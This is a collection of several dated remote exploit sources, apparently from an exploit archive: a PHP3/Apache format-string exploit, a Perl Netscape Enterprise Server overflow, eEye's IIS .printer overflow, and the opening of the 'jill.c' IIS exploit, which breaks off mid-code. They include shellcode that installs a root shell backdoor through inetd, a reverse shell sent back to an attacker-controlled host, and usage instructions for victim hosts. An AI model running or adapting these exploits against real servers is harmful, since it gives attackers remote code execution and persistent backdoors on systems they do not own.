* We just printf the shellcode and stuff and nc it to the target
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// this exploit does not like 0x0a = '\n' in the shellcode. also the NULL at
// the end of the shellcode will be removed as the shellcode is probably
// strcatted into the buffer. so do it again in the shellcode.
/*
* This shellcode is for Linux/x86.
* This shellcode spawns a shell and runs the command
* echo 'ingreslock stream tcp nowait root /bin/bash bash -i'>/tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf
*/
char shellcode[] = {
0xeb,0x41,
0x5e,
0x31,0xc0,
0x31,0xdb,
0xb0,0xa0,
0x89,0x34,0x06,
0x8d,0x4e,0x07,
0x88,0x19,
0x41,
0x41,
0xb0,0xa4,
0x89,0x0c,0x06,
0x8d,0x4e,0x0b,
0x88,0x19,
0x41,
0xb0,0xa8,
0x89,0x0c,0x06,
0x8d,0x4e,0x7f,
0x88,0x19,
0x31,0xd2,
0xb0,0xac,
0x89,0x14,0x06,
0x89,0xf3,
0x89,0xf1,
0xb0,0xa0,
0x01,0xc1,
0xb0,0x0b,
0xcd,0x80,
0x31,0xc0,
0xb0,0x01,
0x31,0xdb,
0xcd,0x80,
0xe8,0xba,0xff,0xff,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0xff,0xff, /* the string "/bin/sh" */
0x2d,0x63,0xff, /* the string "-c" */
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20, 0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20, 0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e, 0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f, 0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73, 0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f, 0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b, 0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69, 0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NOP 0x90
/*
* the PHP3 error buffer will already contain PHP 3 Warning: The Content-Type
* string was "multipart/form-data. This is 66 bytes long. we send 2 spaces
* for padding the addresses we embed in our attack buffer on word boundary
*/
#define PHP3_WARNING 68
#define BUF_LEN 1024
struct system_type {
char *name;
unsigned int nop;
char *shellcode;
int shellcode_len;
int offset; /* the number of pops we need to get to our own data*/
int already_written; /* number of bytes written by printf by the time we reach the our embedded data */
unsigned int eip_address; /* address where shellcode_address must be put */
unsigned int shellcode_address; /* address of shellcode in memory */
};
struct system_type systems[] = {
{
"Slackware Linux 7.0 - i386/Apache 1.3.12/PHP 3.0.16 (static module)",
0x90,
shellcode,
270, /* not exact but we got lots of space ;) */
27,
0x152,
0xbfff9c30,
0xbfff962c,
},
// somebody find these and fill it in please. should be
// straightforward.
{
"Red Hat 6.0 - i386/Apache 1.3.13/PHP 3.0.16 (static module)",
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
{
NULL,
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
};
void usage (void);
void parse_url (char *, char *);
void prepare_attack_buffer (char *, struct system_type *, char *);
int calculate_precision (unsigned int, int);
int
main (int argc, char *argv[])
{
char attack_buffer[2000]; // we construct the shellcode and stuff here
// the target is 1024 bytes long
struct system_type *sysptr;
char *url; // i hope these things dont get bigger than this
char target[2048]; // target will contain only the FQDN
unsigned int eip_address = 0, shellcode_address = 0;
int ctr = 0;
int nop_count;
char *walk;
int arg;
// at least expect a system type and url from the command line
if (argc < 3)
usage ();
// parse arguments
while ((arg = getopt (argc, argv, "s:u:e:h:")) != -1){
switch (arg){
case 'h':
sscanf (optarg, "%x", &shellcode_address);
break;
case 'e':
sscanf (optarg, "%x", &eip_address);
break;
case 's':
sysptr = &systems[atoi (optarg)];
break;
case 'u':
url = optarg;
parse_url (url, target);
break;
case '?':
default :
usage ();
}
}
if (eip_address)
sysptr->eip_address = eip_address;
if (shellcode_address)
sysptr->shellcode_address = shellcode_address;
prepare_attack_buffer (attack_buffer, sysptr, url);
// as of now write it out to stdout. later write it to a socket
write (STDOUT_FILENO, attack_buffer, sizeof (attack_buffer));
}
void
prepare_attack_buffer (char *attack_buffer, struct system_type *system,
char *url)
{
int dest_buffer_written; /* we keep track of how much bytes will be written in the destination buffer */
int ctr;
char *address;
char buf[25]; // temp buffer for %xd%n%xd%n%xd%n%xd%n
// where x is precision
int p1,p2,p3,p4;
int nop_count;
bzero (attack_buffer, 2000);
sprintf (attack_buffer, "POST http://%s HTTP/1.0\nConnection: close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data ", url);
// mark strlen here. whatever we write after here appears in the buffer
dest_buffer_written = strlen (attack_buffer);
strcat (attack_buffer, "\x11\x11\x11\x11");
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
/*
* we need to add %x corresponding to the number of pops we need to reach
* our embedded addresses we defined above
*/
for (; system->offset; system->offset--)
strcat (attack_buffer, "%x ");
p1 = calculate_precision ((system->shellcode_address & 0x000000ff), system->already_written);
p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8, system->already_written);
p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16, system->already_written);
p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24, system->already_written);
sprintf (buf, "%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4);
strcat (attack_buffer, buf);
ctr = strlen (attack_buffer);
dest_buffer_written = ctr - dest_buffer_written;
dest_buffer_written += PHP3_WARNING; // dest_buffer_written now contains the number of bytes the PHP_WARNING and then the 8 4 byte values and then the %x to pop off the stack
attack_buffer += ctr;
nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len;
memset (attack_buffer, NOP, nop_count);
/*
* Add our shellcode at last
*/
attack_buffer += nop_count;
strcat (attack_buffer, shellcode);
strcat (attack_buffer, "\n");
strcat (attack_buffer, "Content-Length: 1337\n\n");
}
void
usage (void)
{
int ctr;
fprintf (stderr, " Apache/PHP xploit\n");
fprintf (stderr, " Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau\n");
fprintf (stderr, " for the r00tcrew\n");
fprintf (stderr, " All rights reserved\n");
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "phpxpl -u url -s systype [ -e eip address ] [ -h shellcode address ]\n\n");
fprintf (stderr, "url: the complete url including FQDN and script on the server\n");
fprintf (stderr, " www.victim.com/info.php3\n");
fprintf (stderr, "available systypes:\n");
for (ctr = 0; systems[ctr].name; ctr++)
fprintf (stderr, "%d. %s\n", ctr, systems[ctr].name);
fprintf (stderr, "eip address: the address which the xploit overwrites with buffer address (specify thus 0xbfff9c30) \n");
fprintf (stderr, "shellcode address: the address which points to the NOPs (specify thus 0xbfff962c)\n");
fprintf (stderr, "\n");
exit (1);
}
void
parse_url (char *url, char *target)
{
char *ptr;
strcpy (target, url);
if (!(ptr = index (target, '/'))){
fprintf (stderr, "invalid url. specify the script name on the target server too\n");
exit (1);
}
*ptr = '\0';
}
/*
* addr_byte contains the byte we need to write out. for example: 2c in
* 0xbfff962c, then 96, ff and bf.
*/
int
calculate_precision (unsigned int addr_byte, int already_written_init)
{
static int already_written = 0;
int tmp;
if (!already_written)
already_written = already_written_init;
while (addr_byte < already_written)
addr_byte += 0x100;
tmp = addr_byte - already_written;
already_written = addr_byte;
return tmp;
}
// [2000-12-06]
80 Netscape Enterprise Server 4.0/sparc/SunOS 5.7 Remote Exploit
#!/usr/bin/perl
#
# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ns-shtml.pl ['command line'] | nc victim port
#
# Sometimes server may hang or coredump.. eek ;-)
# [email protected]
$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];
$nop='%80%1b%c0%1f';
$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;
$shell=
'%20%bf%ff%ff' .# start: bn,a <start-4> ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .# boom: bn,a <start>
'%7f%ff%ff%ff' .# call boom
'%90%03%e0%48' .# add %o7, binksh - boom, %o0 ! put binksh address into %o0
'%92%03%e0%38' .# add %o7, argz - boom, %o1 ! put address of argz array into %o1
'%a0%03%e0%51' .# add %o7, minusc - boom, %l0 ! put address of -c argument into %l0
'%a2%03%e0%54' .# add %o7, cmdline - boom, %l1 ! put address of command line argument into %l1
'%c0%2b%e0%50' .# stb %g0, [ %o7 + minusc-boom-1 ] ! put ending zero byte at the end of /bin/sh
'%c0%2b%e0%53' .# stb %g0, [ %o7 + cmdline-boom-1 ] ! put ending zero byte at the end of -c
'%c0%2b%e0' . $strlen .# stb %g0, [ %o7 + endmark-boom-1 ] ! put ending zero byte at the end of command line
'%d0%23%e0%38' .# st %o0, [ %o7 + argz-boom ] ! store pointer to ksh into 0 element of argz
'%e0%23%e0%3c' .# st %l0, [ %o7 + argz-boom+4 ] ! store pointer to -c into 1 element of argz
'%e2%23%e0%40' .# st %l1, [ %o7 + argz-boom+8 ] ! store pointer to cmdline into 2 element of argz
'%c0%23%e0%44' .# st %g0, [ %o7 + argz-boom+12 ] ! store NULL pointer at the end
'%82%10%20%0b' .# mov 0xb, %g1
'%91%d0%20%08' .# ta 8
'%ff%ff%ff%ff'. # 40 argz: 0xffffffff;
'%ff%ff%ff%ff'. # 44 0xffffffff;
'%ff%ff%ff%ff'. # 48 0xffffffff;
'%ff%ff%ff%ff'. # 52 0xffffffff;
'/bin/kshA' . # 56 binksh: "/bin/kshA";
'-cA' . $cmdline . 'A'; # cmdline: "blahblahA";
##################################################
# Generate huge GET /..<shellcode>...shtml here #
##################################################
$padd=814-length($shell);
print STDERR "pad is $padd\n";
print "GET /";
print $nop x 40;
print $she11;
print "A"x $padd;
print "\xfd\xe7%dc\x80"; # %i0
print "AAAA"; # %i1
print "AAAA"; # %i2
print "AAAA"; # %i3
print "AAAA"; # %i4
print "AAAA"; # %i5
print '%fd%c3%16%58'; #%fp (%i6)
print '%ff%21%d7%ac'; # %i7
print "A"x1200;
print ".shtml HTTP/1.0\n\n";
# [2001-01-27]
80 MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit
/************************************************** *********************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded. This is purely proof of concept.
Quick rundown of the exploit:
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll). The
jumpback was kinda weird, requiring a little forward padding to protect
the rest of the code.
The buffer itself:
Uou only have about 250ish bytes before the overflow(taking into
account the eip and jumpback), and like 211 after it. this makes
things tight. This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision. normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.
This should compile clean on windows, linux and *bsd. Other than that, you
are on your own, but the vector is a simple tcp vector, so no biggie.
The vector:
the overflow happens in the isapi handling the .printer extension. The actual
overflow is in the Host: header. This buffer is a bit weird, soi be carfull
what you pass into it. It has a minimal amount of parsing happening before
we get it, making some chars not able to be used(or forcing you to encode
your payload). As far as i can tell, the bad bytes i've come across are:
0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or
energy to reverse it any further, it breaks stuff, keep it out of
your buffer)
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode), i've come across
problems, but haven't specifically tagged a "bad" char.
One more thing... inititally, i got this shellcode to fit on the left side of
the buffer overflow. something strange was causing it to fail if i had a length
of under about 315 chars. This seems strange to me, but it could be soemthing i
just screwed up writing this code. This explains the 0x03s padding the end of the
shellcode.
Ryan Permeh
[email protected]
greetz: riley, for finding the hole
marc, for being a cool boss
dale,nicula,firas, for being pimps
greg hoglund, for sparking some really interesting ideas on exploitable buffers
dark spyrit, for beginning the iis hack tradition
I would also like to thank the academy and to all of those who voted....
Barry, Levonne, and their $240.00 worth of pudding.
http://www.eeye.com/html/research/Advisories/tequila.jpg
************************************************** ***********************/
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);
unsigned char sc[2][315]={
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x 30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x 03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x 04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x 80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x 83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x 07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x 56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\x b8\xb3\xeb\x74\x27\x49"
"\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x 66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x 68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x 66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x 6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x 74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x 90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\x e4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x00"
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x 30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x 03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x 04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x 80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x 83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x 07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x 56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x 2e\xf0\xeb\x74\x4c\x30"
"\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x 66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x 68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x 66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x 6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x 74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x 90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\x e4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x00"
};
main (int argc, char *argv[])
{
char request_message[500];
int X,sock,sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
#ifdef _WIN32
WORD werd;
WSADATA wsd;
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
#endif
printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
printf("Vulnerability found by Riley Hassell <[email protected]>\n");
printf("Exploit by Ryan Permeh <[email protected]>\n");
if(argc < 4) usage();
if(argv[1] != NULL)
{
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
}
else usage();
if(argv[2] != NULL)
{
serverport=ntohs((unsigned short)atoi(argv[2]));
}
if(argv[3] != NULL)
{
sp=atoi(argv[3]);
}
printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
memset(request_message,0x00,500);
snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X==0)
{
send(sock,request_message,strlen(request_message)* sizeof(char),0);
printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
}
else
{
printf("Couldn't connect\n",inet_ntoa(attack));
}
#ifdef _WIN32
closesocket(sock);
#else
close(sock);
#endif
return 0;
}
void usage()
{
printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n");
printf("Example: iishack2000 127.0.0.1 80 0\n");
printf("Example: iishack2000 127.0.0.1 80 1\n");
exit(1);
}
// [2001-05-07]
80 MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
*
* by: dark spyrit <[email protected]>
*
* respect to eeye for finding this one - nice work.
* shouts to halvar, neofight and the beavuh bitchez.
*
* this exploit overwrites an exception frame to control eip and get to
* our code.. the code then locates the pointer to our larger buffer and
* execs.
*
* usage: jill <victim host> <victim port> <attacker host> <attacker port>
*
* the shellcode spawns a reverse cmd shell.. so you need to set up a
* netcat listener on the host you control.
*
* Ex: nc -l -p <attacker port> -vv
*
* I haven't slept in years.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
int main(int argc, char *argv[]){
/* the whole request rolled into one, pretty huh? carez. */
unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x 69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x 61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x 83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x 40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x 60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\x e6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x 78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x 9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x 56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x 96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\x e1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x 4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x 52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\x f1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\x c5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x 95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\x d2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x 18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x 95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x 85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\x c2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x 95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x 02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\x d2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\x c2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\x f5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x 95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x 05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x 05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x 8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\x ff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x 39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\x f0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\x d9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\x f0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\x d6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\x fe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\x f9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\x f1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\x fa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\x c2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x 95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\x e1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\x e3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\x b3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
printf("iis5 remote .printer overflow.\n"
"dark spyrit <[email protected]> / beavuh labs.\n");
if (argc != 5){
printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
exit(1);
}
if ((ht = gethostbyname(argv[1])) == 0){
herror(argv[1]);
exit(1);
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
